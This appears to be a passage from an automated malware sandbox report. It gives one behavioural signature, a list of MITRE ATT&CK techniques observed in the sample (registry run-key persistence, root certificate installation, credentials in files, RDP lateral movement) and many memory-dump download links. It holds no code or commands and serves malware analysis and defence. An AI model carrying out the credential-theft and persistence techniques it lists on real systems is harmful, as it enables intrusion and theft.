    - Suspicious use of AdjustPrivilegeToken
    PID:320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Scripting

T1064

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/320-268-0x000000001960A000-0x0000000019629000-memory.dmp

Filesize
124KB

Download
memory/320-237-0x0000000019600000-0x0000000019602000-memory.dmp

Filesize
8KB

Download
memory/320-238-0x0000000019604000-0x0000000019606000-memory.dmp

Filesize
8KB

Download
memory/736-63-0x00000000003B0000-0x00000000003B9000-memory.dmp

Filesize
36KB

Download
memory/736-60-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

Filesize
4KB

Download
memory/736-62-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/960-134-0x000000001AC1A000-0x000000001AC39000-memory.dmp

Filesize
124KB

Download
memory/960-105-0x0000000002310000-0x0000000002311000-memory.dmp

Filesize
4KB

Download
memory/960-117-0x000000001AB80000-0x000000001AB81000-memory.dmp

Filesize
4KB

Download
memory/960-118-0x000000001B540000-0x000000001B541000-memory.dmp

Filesize
4KB

Download
memory/960-119-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/960-102-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/960-103-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/960-100-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

Filesize
4KB

Download
memory/960-104-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/960-115-0x0000000001E30000-0x0000000001E31000-memory.dmp

Filesize
4KB

Download
memory/960-101-0x000000001AC90000-0x000000001AC91000-memory.dmp

Filesize
4KB

Download
memory/960-107-0x000000001C520000-0x000000001C521000-memory.dmp

Filesize
4KB

Download
memory/960-99-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

Filesize
8KB

Download
memory/1288-183-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

Filesize
8KB

Download
memory/1288-182-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

Filesize
8KB

Download
memory/1336-66-0x00000000757E1000-0x00000000757E3000-memory.dmp

Filesize
8KB

Download
memory/1336-67-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1336-64-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1548-96-0x0000000027F67000-0x0000000027F68000-memory.dmp

Filesize
4KB

Download
memory/1548-91-0x0000000040EF0000-0x000000004119A000-memory.dmp

Filesize
2.7MB

Download
memory/1548-95-0x0000000027F66000-0x0000000027F67000-memory.dmp

Filesize
4KB

Download
memory/1548-93-0x0000000027F62000-0x0000000027F64000-memory.dmp

Filesize
8KB

Download
memory/1548-94-0x0000000027F64000-0x0000000027F66000-memory.dmp

Filesize
8KB

Download
memory/1548-97-0x0000000027F6C000-0x0000000027F8B000-memory.dmp

Filesize
124KB

Download
memory/1548-90-0x0000000000400000-0x00000000008DB000-memory.dmp

Filesize
4.9MB

Download
memory/1548-89-0x0000000000400000-0x00000000008DB000-memory.dmp

Filesize
4.9MB

Download
memory/1724-85-0x000000001CF30000-0x000000001D3D5000-memory.dmp

Filesize
4.6MB

Download
memory/1724-86-0x0000000000750000-0x0000000000760000-memory.dmp

Filesize
64KB

Download
memory/1724-84-0x000000001B990000-0x000000001B992000-memory.dmp

Filesize
8KB

Download
memory/1724-83-0x000000001BF50000-0x000000001C581000-memory.dmp

Filesize
6.2MB

Download
memory/1724-88-0x000000001DFA0000-0x000000001E42D000-memory.dmp

Filesize
4.6MB

Download
memory/1724-80-0x000000013FA40000-0x000000013FA41000-memory.dmp

Filesize
4KB

Download
memory/1724-87-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/1796-166-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/1796-164-0x000000001ABE0000-0x000000001ABE1000-memory.dmp

Filesize
4KB

Download
memory/1796-162-0x0000000002420000-0x0000000002421000-memory.dmp

Filesize
4KB

Download
memory/1796-161-0x000000001ADC4000-0x000000001ADC6000-memory.dmp

Filesize
8KB

Download
memory/1796-160-0x000000001ADC0000-0x000000001ADC2000-memory.dmp

Filesize
8KB

Download
memory/1796-167-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/1880-128-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1880-139-0x000000001BA70000-0x000000001BA71000-memory.dmp

Filesize
4KB

Download
memory/1880-133-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1880-152-0x000000001B580000-0x000000001B581000-memory.dmp

Filesize
4KB

Download
memory/1880-153-0x000000001B590000-0x000000001B591000-memory.dmp

Filesize
4KB

Download
memory/1880-132-0x000000001AA60000-0x000000001AA61000-memory.dmp

Filesize
4KB

Download
memory/1880-130-0x000000001B750000-0x000000001B751000-memory.dmp

Filesize
4KB

Download
memory/1880-126-0x000000001AAC4000-0x000000001AAC6000-memory.dmp

Filesize
8KB

Download
memory/1880-125-0x000000001AAC0000-0x000000001AAC2000-memory.dmp

Filesize
8KB

Download